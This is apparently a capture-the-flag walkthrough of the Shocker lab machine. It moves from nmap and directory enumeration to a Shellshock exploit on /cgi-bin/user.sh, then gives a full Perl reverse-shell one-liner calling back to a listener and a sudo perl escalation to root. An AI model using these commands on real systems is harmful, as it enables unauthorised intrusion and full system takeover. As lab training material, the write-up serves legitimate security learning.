Ping
ping 10.10.10.56
Nmap default Scan
nmap 10.10.10.56 -sC -sV -oN snmap
All port Scan
nmap 10.10.10.56 -p- --open -T5 -sC -sV -oN anmap
Port 80
Gobuster on port 80
gobuster dir -u http://10.10.10.56// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt
Nothing Interesting.
Using dirb
dirb http://10.10.10.56 -o dirb.txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
We have found a new directory /cgi-bin
Will exploit the cgi-bin also we can add .sh and .cgi extensions in Gobuster
gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf,sh,cgi -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster_cgi-bin.txt
We found a new file user.sh
The new directory, downloads a file
Content of user.sh
We can use this /cgi-bin/user.sh as shellshock code
Will find exploit for cgi-bin
We found one from Exploit-db https://www.exploit-db.com/exploits/34900
Slightly modified the exploit code according to our need
Included vulnerable directory
Then ran the exploit
python2 exp.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.7 lport=443
We got RCE, will get reverse shell now
Reverse shell using Perl
perl -e 'use Socket;$i="10.10.14.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
rlwrap nc -nvlp 4444
python3 -c 'import pty; pty.spawn("/bin/bash")'
Got reverse shell and upgraded my shell to interactive using python 3.
Got user.txt
Let’s Strat with sudo permissions
sudo -l
Perl has sudo privilege with no password
Will exploit this to escalate our privilege
sudo perl -e 'exec "/bin/sh";'
We are in as root now
We got our root flag
That’s it, we are done with Shocker…:)